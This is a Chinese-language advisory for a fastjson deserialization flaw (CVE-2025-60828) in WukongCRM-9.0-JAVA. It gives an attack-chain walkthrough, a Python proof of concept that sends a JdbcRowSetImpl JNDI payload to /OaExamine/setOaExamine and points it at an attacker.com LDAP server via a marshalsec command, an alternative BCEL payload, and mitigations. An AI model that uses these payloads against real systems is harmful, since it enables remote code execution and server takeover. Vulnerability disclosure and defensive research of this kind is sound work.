CVE-2025-60828 WukongCRM-9.0-JAVA fastjson反序列化漏洞

漏洞信息

漏洞编号

CVE-2025-60828

漏洞类型

反序列化漏洞

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WukongCRM-9.0-JAVA

漏洞概述

CVE-2025-60828是WukongCRM-9.0-JAVA客户关系管理系统中存在的fastjson反序列化漏洞。该漏洞存在于系统的/OaExamine/setOaExamine接口中，攻击者可以通过构造恶意的JSON payload，利用fastjson库在反序列化过程中存在的安全缺陷，触发远程代码执行（RCE）。WukongCRM是基于Java开发的开源CRM系统，广泛应用于中小企业客户管理、销售流程跟踪、办公审批等业务场景。由于该系统的/OaExamine模块负责处理办公审批流程，其中涉及对用户提交数据的反序列化操作，当系统使用存在缺陷的fastjson版本时，攻击者可以利用autoType特性或特定gadget链实现远程代码执行。CVSS评分为6.5分，属于中危级别，攻击者无需认证即可通过网络发起攻击，对系统的机密性、完整性和可用性均会造成低程度的影响。该漏洞的披露时间为2025年10月8日，由MITRE组织记录在案，参考链接中包含了详细的技术分析和PoC代码。

技术细节

该漏洞的核心成因在于WukongCRM-9.0-JAVA系统使用了存在安全缺陷的fastjson库来处理/OaExamine/setOaExamine接口的请求数据。fastjson是阿里巴巴开源的Java JSON解析库，在早期版本中默认开启了autoType功能，允许在反序列化过程中自动加载指定类型的Java类。攻击者可以利用这一特性，通过精心构造的JSON数据，指定反序列化为危险的Java类（如com.sun.rowset.JdbcRowSetImpl、org.apache.tomcat.dbcp.dbcp2.BasicDataSource等），结合JNDI注入或RMI/LDAP远程加载机制，实现远程代码执行。

具体利用方式如下：
1. 攻击者向/OaExamine/setOaExamine接口发送包含恶意@type字段的POST请求；
2. fastjson在反序列化时识别@type指定的类，并尝试实例化该类；
3. 通过JdbcRowSetImpl类的dataSourceName属性，触发JNDI查找；
4. JNDI连接到攻击者控制的恶意RMI/LDAP服务器；
5. 服务器返回包含恶意字节码的引用，JVM加载并执行该字节码；
6. 最终在服务器上执行任意命令，获取系统控制权。

该漏洞的攻击复杂度低，无需用户交互和身份验证，攻击者只需通过网络即可远程利用，对部署在公网的WukongCRM系统构成严重威胁。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过搜索引擎、Shodan等工具发现暴露在公网的WukongCRM-9.0-JAVA系统，识别其版本及使用的fastjson库版本。

STEP 2

步骤2：环境搭建

攻击者在自己的服务器上部署恶意LDAP/RMI服务，并准备包含恶意字节码的Java类文件，利用marshalsec等工具搭建JNDI注入环境。

STEP 3

步骤3：构造Payload

构造包含@type字段的恶意JSON数据，指定反序列化为com.sun.rowset.JdbcRowSetImpl等危险类，并设置dataSourceName指向攻击者控制的LDAP/RMI地址。

STEP 4

步骤4：发送攻击请求

向目标系统的/OaExamine/setOaExamine接口发送POST请求，携带恶意JSON payload，触发fastjson反序列化漏洞。

STEP 5

步骤5：触发JNDI注入

fastjson反序列化时实例化恶意类，触发JNDI远程查找，连接到攻击者控制的LDAP/RMI服务器。

STEP 6

步骤6：远程代码执行

JVM加载并执行攻击者提供的恶意字节码，在目标服务器上执行任意命令，获取系统控制权限。

STEP 7

步骤7：持久化与横向移动

攻击者在获取服务器权限后，可植入后门、窃取敏感数据，并尝试在内网中进行横向移动，扩大攻击范围。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-60828 PoC - WukongCRM-9.0-JAVA fastjson deserialization RCE
# Attack vector: POST /OaExamine/setOaExamine
# Target: WukongCRM-9.0-JAVA with vulnerable fastjson version

import requests
import sys

TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target:8080"
LDAP_URL = sys.argv[2] if len(sys.argv) > 2 else "ldap://attacker.com:1389/Exploit"

# Step 1: Set up malicious LDAP/RMI server (using marshalsec or similar tool)
# Run on attacker machine: java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://attacker.com:8000/#Exploit" 1389

# Step 2: Craft malicious JSON payload exploiting fastjson autoType
payload = {
    "@type": "com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName": LDAP_URL,
    "autoCommit": True
}

# Step 3: Send exploit to vulnerable endpoint
endpoint = f"{TARGET_URL}/OaExamine/setOaExamine"
headers = {
    "Content-Type": "application/json",
    "User-Agent": "Mozilla/5.0"
}

try:
    response = requests.post(endpoint, json=payload, headers=headers, timeout=10)
    print(f"[+] Exploit sent to {endpoint}")
    print(f"[+] Status Code: {response.status_code}")
    print(f"[+] Response: {response.text[:500]}")
    if response.status_code == 200:
        print("[+] Target appears vulnerable!")
except Exception as e:
    print(f"[-] Error: {e}")

# Alternative payload using BasicDataSource (Tomcat JDBC pool)
alternative_payload = {
    "@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
    "driverClassName": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
    "driverClassLoader": {
        "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
    },
    "initialSize": 1
}

影响范围

WukongCRM-9.0-JAVA

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）在应用代码中禁用fastjson的autoType功能；2）在网络层面部署WAF规则，拦截包含@type字段的异常JSON请求；3）限制服务器对外的JNDI/LDAP/RMI网络连接，仅允许访问可信地址；4）监控系统日志，关注/OaExamine/setOaExamine接口的异常访问行为；5）对关键业务系统进行网络隔离，避免直接暴露在公网。